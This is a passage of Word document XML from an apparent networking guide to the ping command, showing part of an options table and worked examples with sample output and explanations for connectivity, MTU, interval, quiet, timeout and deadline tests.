            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58233DD1"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l preload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B0758BC" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00473DCD">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Send preload packets before entering normal mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="1E37F546" w14:textId="77777777" w:rsidTr="00473DCD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EFABAF9"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p pattern</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13E39E2E" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00473DCD">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Fill packets with given pattern (hex)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="64F16A68" w14:textId="77777777" w:rsidTr="00473DCD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63C9387F"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I interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39895793" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00473DCD">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Use specified interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="361C888E" w14:textId="77777777" w:rsidTr="00473DCD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C8C06FA"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M hint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42F46D93" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00473DCD">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Path MTU discovery strategy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="4345E58A" w14:textId="77777777" w:rsidTr="00473DCD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FAF757E"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F</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="093B4EAD" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00473DCD">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Don't fragment packets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="569EB5E0" w14:textId="77777777" w:rsidTr="00473DCD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B83BCCA"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O</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37EE9389" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00473DCD">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Report outstanding replies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="040EB3F6" w14:textId="77777777" w:rsidTr="00473DCD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21B43AAD" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="00473DCD" w:rsidRDefault="0017552F" w:rsidP="00473DCD">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00473DCD">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              </w:rPr>
              <w:t>-D</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A3BD2B2" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00473DCD">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Print timestamps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="431A87CF" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00B31277">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Examples and Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD8E6D0" w14:textId="4385B7FE" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00B31277">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Basic connectivity test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1BB8DD"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google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718FE780" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B10506"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google.com (142.251.46.142) 56(84) bytes of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1A83D4"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64 bytes from lga25s62-in-f14.1e100.net (142.251.46.142): icmp_seq=1 ttl=119 time=12.3 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6640553F"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64 bytes from lga25s62-in-f14.1e100.net (142.251.46.142): icmp_seq=2 ttl=119 time=11.8 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D134E31"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64 bytes from lga25s62-in-f14.1e100.net (142.251.46.142): icmp_seq=3 ttl=119 time=12.1 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AB94C0"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C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6976799E"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 google.com ping statistics ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01248396"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3 packets transmitted, 3 received, 0% packet loss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D8B528"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time 2003ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AAAB0E"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rtt min/avg/max/mdev = 11.8/12.1/12.3/0.2 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62711046" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268A459E" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00473DCD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="129"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00473DCD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PING google.com (142.251.46.142)</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t>: Resolved hostname to IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219D7F5D" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00473DCD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="129"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00473DCD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>56(84) bytes</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t>: 56 bytes ICMP data + 28 bytes headers = 84 total</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322BD8C5" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00473DCD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="129"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00473DCD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>64 bytes from</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t>: Reply packet size (56 + 8 byte ICMP header)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5727CA11" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00473DCD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="129"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00473DCD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>icmp_seq=1</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t>: Sequence number for tracking packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7FD97A" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00473DCD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="129"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00473DCD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ttl=119</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t>: Time To Live (hops remaining, started ~128, decreased by routers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC6D4FE" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00473DCD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="129"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00473DCD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>time=12.3 ms</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t>: Round-trip time from send to receive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E5EC8A" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00473DCD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="129"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00473DCD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0% packet loss</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t>: All packets successfully returned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B042ED" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00473DCD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="129"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00473DCD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rtt min/avg/max/mdev</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t>: Round-trip time statistics and standard deviation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49043AF0" w14:textId="0239FA24" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00B31277">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Send specific number of packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4255F5E9"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c 5 8.8.8.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2677DD89" w14:textId="39CE5ED4" w:rsidR="001D111D" w:rsidRDefault="001D111D" w:rsidP="0017552F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084F0A9D"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PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B56D83D"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lastRenderedPageBreak/>
        <w:t>64 bytes from 8.8.8.8: icmp_seq=1 ttl=119 time=11.2 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB286A2"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8.8.8.8: icmp_seq=2 ttl=119 time=10.8 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E3D2F6"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8.8.8.8: icmp_seq=3 ttl=119 time=11.1 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2321069A"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8.8.8.8: icmp_seq=4 ttl=119 time=10.9 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4507169D"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8.8.8.8: icmp_seq=5 ttl=119 time=11.0 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFB689E"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36E9383C"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8.8.8.8 ping statistics ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1F3089"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5 packets transmitted, 5 received, 0% packet loss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4395D056"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time 4004ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78ACA997" w14:textId="1A885F30"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rtt min/avg/max/mdev = 10.8/11.0/11.2/0.1 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C7B49F" w14:textId="62E280E6" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Quick connectivity test with limited packets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666934D1" w14:textId="585E9B45" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00B31277">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Large packet size test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1C15E8"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c 3 -s 1472 google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307CE91C" w14:textId="5D8F6FE5" w:rsidR="001D111D" w:rsidRDefault="001D111D" w:rsidP="0017552F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1E7465"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PING google.com (142.251.46.142) 1472(1500) bytes of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24641CC9"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1480 bytes from lga25s62-in-f14.1e100.net (142.251.46.142): icmp_seq=1 ttl=119 time=15.2 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB1198C"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1480 bytes from lga25s62-in-f14.1e100.net (142.251.46.142): icmp_seq=2 ttl=119 time=14.8 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382DD11F"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1480 bytes from lga25s62-in-f14.1e100.net (142.251.46.142): icmp_seq=3 ttl=119 time=15.1 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BC741E"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68BF8547"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google.com ping statistics ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1668E197"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3 packets transmitted, 3 received, 0% packet loss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A32DCE"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time 2003ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288DFA49" w14:textId="47A1256D"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rtt min/avg/max/mdev = 14.8/15.0/15.2/0.2 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69815945" w14:textId="30DD2FBB" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Test MTU and detect fragmentation issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224A8CCD" w14:textId="1CE13719" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00B31277">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Fast ping with short interval</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21085B0F"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ping -i 0.2 -c 10 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725DEB79" w14:textId="5CC7F76F" w:rsidR="001D111D" w:rsidRDefault="001D111D" w:rsidP="0017552F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FE43F4"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PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6381A29B"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192.168.1.1: icmp_seq=1 ttl=64 time=0.445 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4812A2"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192.168.1.1: icmp_seq=2 ttl=64 time=0.412 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFFDA80"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192.168.1.1: icmp_seq=3 ttl=64 time=0.398 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146E078A"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192.168.1.1: icmp_seq=4 ttl=64 time=0.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2404F5"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192.168.1.1: icmp_seq=5 ttl=64 time=0.423 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDF244F"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192.168.1.1: icmp_seq=6 ttl=64 time=0.434 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4780EDD3"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192.168.1.1: icmp_seq=7 ttl=64 time=0.401 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38308CB2"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192.168.1.1: icmp_seq=8 ttl=64 time=0.445 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399268B9"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192.168.1.1: icmp_seq=9 ttl=64 time=0.412 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C855CD"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192.168.1.1: icmp_seq=10 ttl=64 time=0.434 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60907615"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210EF0F4"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192.168.1.1 ping statistics ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553E74A4"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10 packets transmitted, 10 received, 0% packet loss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580D93AA"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time 1804ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE6C3AA"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rtt min/avg/max/mdev = 0.398/0.426/0.456/0.018 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589A05F8" w14:textId="052B8A1B" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Quick response time testing (requires root for &lt;1s interval).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E3EBCA" w14:textId="28E723DE" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00B31277">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Quiet ping (summary only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD95F0D"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q -c 10 8.8.8.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370E0363" w14:textId="0951577E" w:rsidR="001D111D" w:rsidRDefault="001D111D" w:rsidP="0017552F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094E9548"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PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C1A561"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6DF232E2"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8.8.8.8 ping statistics ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F96EE3A"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10 packets transmitted, 10 received, 0% packet loss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3E1716"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time 9006ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5508961C"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rtt min/avg/max/mdev = 10.5/11.2/12.1/0.4 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4720582E" w14:textId="1152F858" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Scripting and automated network monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE3AA43" w14:textId="4D40487A" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00B31277">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Ping with timeout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F07A61B"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W 1000 -c 5 192.168.1.254</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B2AE6B" w14:textId="219A0FD6" w:rsidR="001D111D" w:rsidRDefault="001D111D" w:rsidP="0017552F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143E6DDC"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PING 192.168.1.254 (192.168.1.254) 56(84) bytes of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0959FA"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From 192.168.1.100 icmp_seq=1 Destination Host Unreachable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CDA97C"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From 192.168.1.100 icmp_seq=2 Destination Host Unreachable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EBAF78"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From 192.168.1.100 icmp_seq=3 Destination Host Unreachable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B77BFE"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From 192.168.1.100 icmp_seq=4 Destination Host Unreachable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011C7A3F"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From 192.168.1.100 icmp_seq=5 Destination Host Unreachable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8A747D"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26A3C2B1"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192.168.1.254 ping statistics ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7370D917"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5 packets transmitted, 0 received, +5 errors, 100% packet loss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B452A8F"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time 4004ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237C2484" w14:textId="759ED733" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Fast failure detection with 1-second packet timeout.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C919319" w14:textId="2C459BF6" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00B31277">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Ping with deadline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C51A4C"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w 30 -c 100 google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742BB0DD" w14:textId="67FC7565" w:rsidR="001D111D" w:rsidRDefault="001D111D" w:rsidP="0017552F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E09C2DA"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PING google.com (142.251.46.142) 56(84) bytes of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67850B52"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lga25s62-in-f14.1e100.net (142.251.46.142): icmp_seq=1 ttl=119 time=12.3 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761038BB"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64 bytes from lga25s62-in-f14.1e100.net (142.251.46.142): icmp_seq=2 ttl=119 time=11.8 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675D4602"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output continues for 30 seconds then stops)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0053A01C"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2331FC6F"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 google.com ping statistics ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FADF2E2"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30 packets transmitted, 30 received, 0% packet loss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4BB80B"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time 30005ms</w:t>
      </w:r>
    </w:p>
